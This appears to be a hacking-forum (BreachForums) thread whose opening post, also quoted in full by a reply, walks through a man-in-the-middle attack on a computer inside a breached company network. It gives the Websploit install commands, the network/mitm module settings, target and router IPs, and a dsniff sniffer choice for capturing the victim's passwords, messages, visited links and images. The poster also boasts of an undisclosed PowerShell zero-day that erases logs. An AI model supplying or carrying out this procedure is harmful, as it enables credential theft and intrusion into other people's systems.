I'm telling you how to hack the PC on our network
by reflex - Wednesday August 21, 2024 at 07:01 PM
#1
Let's say you managed to infiltrate a company's network and landed on a compromised computer. At this stage, you'd need to conduct a network discovery and in-depth information gathering process. Assuming you've passed the information gathering and discovery phase, the next step would be to penetrate a privileged computer within the network. Standard-privilege devices have limited capabilities, so you'd need to target a privileged one. If you're wondering how to identify the most privileged computer on the network, the answer is that you should have discovered it during the information gathering and discovery phase. Without further ado, let's begin 

git clone https://github.com/f4rih/websploit -y


or

apt-get install websploit


python setup.py install


First, we download and install the Websploit tool using the command provided above. Then, we check the modules using the following command

show modules


Now we will use the network/mitm module found among the network modules in this module set

use network/mitm


Let's type this command to see the settings we need to adjust

show options


To carry out our attack, we need to assign Interface, ROUTER, TARGET, and SNIFFER. Interface: This is the type of network your computer is connected to. If you type 'ifconfig' into the console, you can see the IP address you've received and the type of connection you're using. For Wi-Fi: wlan0 For Ethernet: eth0
Here, we provide all the information the program needs to carry out the attack. The key point to remember is that we need to obtain the modem IP address of the target computer. We can achieve this through network scanning. In the SNIFFER section of the program, enter the type of attack. Below are the types of attacks

Sniffers        Description
------------    --------------
dsniff        Password Sniffing
msgsnarf        Intercepting victim's instant messages (Messengers)
urlsnarf        Capturing websites visited by the victim (Links)
driftnet        Capturing images displayed on the victim's screen (Images)


set Interface wlan0[/size]
[size=large]set ROUTER 192.168.1.1[/size]
[size=large]set TARGET 192.168.1.101[/size]
[size=large]set SNIFFER [color=#a6a6a6]dsniff ( Passwords )[/color]


NOTE: If you don't have wlan0, use eth0

run


Okay, now all the passwords entered into the target device will be sent to us. An alternative method to this is social engineering

So, for those wondering if I use this method, the answer is no. I use a zero-day exploit called 'Elite Kobra' that I discovered with a friend, which requires no user interaction. Let me tell you a bit about Elite Kobra. It’s a remote command execution vulnerability found in the PowerShell core. My friend and I stumbled upon it by accident in February 2023 while looking for something else, but fate led us to discover Elite Kobra.
I won’t explain how it works because if a programmer follows my instructions step by step, they could recreate Elite Kobra, and I want to keep it as our secret weapon. For those asking why it's called 'Elite Kobra,' it’s because just like a cobra silently sneaks up on its prey, bites it, and injects a venom that kills in five minutes, Elite Kobra also attacks its target quietly. To avoid detection, it overwrites log records and injects a payload into its target. But unlike a cobra, Elite Kobra doesn't take five minutes; it completes everything in just five seconds.
If I ever make enough money and retire from my hacking career, I plan to gift Elite Kobra to the entire BreachForums community. But to do that, I need to retire first  Big Grin

Please note that Elite Cobra only works properly on local networks. It does not function correctly on external networks

I hope this content is helpful to you. Have a nice day, everyone!
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Dishes out second hand retardation | http://breached26tezcofqla4adzyn22notfqw...an-Appeals if you wish to be unbanned in the future.
Reply
#2
a great tutorial thank you helpful
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Leeching | http://breached26tezcofqla4adzyn22notfqw...an-Appeals if you feel this is incorrect.
Reply
#3
glad i helped                                       
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Dishes out second hand retardation | http://breached26tezcofqla4adzyn22notfqw...an-Appeals if you wish to be unbanned in the future.
Reply
#4
this is simply and awsome thanks for sharing
Reply
#5
Would be 10x better without the eye burning random text colours :/
Reply
#6
(08-21-2024, 07:01 PM)reflex Wrote: Let's say you managed to infiltrate a company's network and landed on a compromised computer. At this stage, you'd need to conduct a network discovery and in-depth information gathering process. Assuming you've passed the information gathering and discovery phase, the next step would be to penetrate a privileged computer within the network. Standard-privilege devices have limited capabilities, so you'd need to target a privileged one. If you're wondering how to identify the most privileged computer on the network, the answer is that you should have discovered it during the information gathering and discovery phase. Without further ado, let's begin 

git clone https://github.com/f4rih/websploit -y


or

apt-get install websploit


python setup.py install


First, we download and install the Websploit tool using the command provided above. Then, we check the modules using the following command

show modules


Now we will use the network/mitm module found among the network modules in this module set

use network/mitm


Let's type this command to see the settings we need to adjust

show options


To carry out our attack, we need to assign Interface, ROUTER, TARGET, and SNIFFER. Interface: This is the type of network your computer is connected to. If you type 'ifconfig' into the console, you can see the IP address you've received and the type of connection you're using. For Wi-Fi: wlan0 For Ethernet: eth0
Here, we provide all the information the program needs to carry out the attack. The key point to remember is that we need to obtain the modem IP address of the target computer. We can achieve this through network scanning. In the SNIFFER section of the program, enter the type of attack. Below are the types of attacks

Sniffers        Description
------------    --------------
dsniff        Password Sniffing
msgsnarf        Intercepting victim's instant messages (Messengers)
urlsnarf        Capturing websites visited by the victim (Links)
driftnet        Capturing images displayed on the victim's screen (Images)


set Interface wlan0[/size]
[size=large]set ROUTER 192.168.1.1[/size]
[size=large]set TARGET 192.168.1.101[/size]
[size=large]set SNIFFER [color=#a6a6a6]dsniff ( Passwords )[/color]


NOTE: If you don't have wlan0, use eth0

run


Okay, now all the passwords entered into the target device will be sent to us. An alternative method to this is social engineering

So, for those wondering if I use this method, the answer is no. I use a zero-day exploit called 'Elite Kobra' that I discovered with a friend, which requires no user interaction. Let me tell you a bit about Elite Kobra. It’s a remote command execution vulnerability found in the PowerShell core. My friend and I stumbled upon it by accident in February 2023 while looking for something else, but fate led us to discover Elite Kobra.
I won’t explain how it works because if a programmer follows my instructions step by step, they could recreate Elite Kobra, and I want to keep it as our secret weapon. For those asking why it's called 'Elite Kobra,' it’s because just like a cobra silently sneaks up on its prey, bites it, and injects a venom that kills in five minutes, Elite Kobra also attacks its target quietly. To avoid detection, it overwrites log records and injects a payload into its target. But unlike a cobra, Elite Kobra doesn't take five minutes; it completes everything in just five seconds.
If I ever make enough money and retire from my hacking career, I plan to gift Elite Kobra to the entire BreachForums community. But to do that, I need to retire first  Big Grin

Please note that Elite Cobra only works properly on local networks. It does not function correctly on external networks

I hope this content is helpful to you. Have a nice day, everyone!

congrats, seems nice, please use a bit less colors next time Big Grin
Buy me drugs - XMR: 4565V8rDRko3gKtbmbrzGzMkn7p4m7aZdHhrq6s2mtUTF3uG6p2F8AC9MGRbXs62GxdYQtjujFKccZDmCw13tDFi4tKqK5J
Autism Corporation®
Reply
#7
(08-25-2024, 07:42 AM)seraph8 Wrote: Would be 10x better without the eye burning random text colours :/

My soul is colorful, my friend Big Grin

(08-25-2024, 07:48 AM)swag Wrote: congrats, seems nice, please use a bit less colors next time Big Grin

I have space for every color within me
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Dishes out second hand retardation | http://breached26tezcofqla4adzyn22notfqw...an-Appeals if you wish to be unbanned in the future.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  How to hack information dajshfkklja 2 248 7 hours ago
Last Post: sfdhu123
  Tor / Tor Network / Safe in Darkweb - Darknet NanC 10 549 07-28-2025, 08:44 AM
Last Post: jokecoffin
  Discord Chanel hack the box ShadowSpecter 1 194 03-24-2025, 10:20 PM
Last Post: RedBlock
  How to hack my neighbors wifi protonmail 21 3,599 03-13-2025, 11:19 AM
Last Post: DredgenSun
  frazaoleiloes.com.br hack sophiaR 4 369 02-20-2025, 09:20 AM
Last Post: kc1dr4nd0

Forum Jump:


 Users browsing this thread: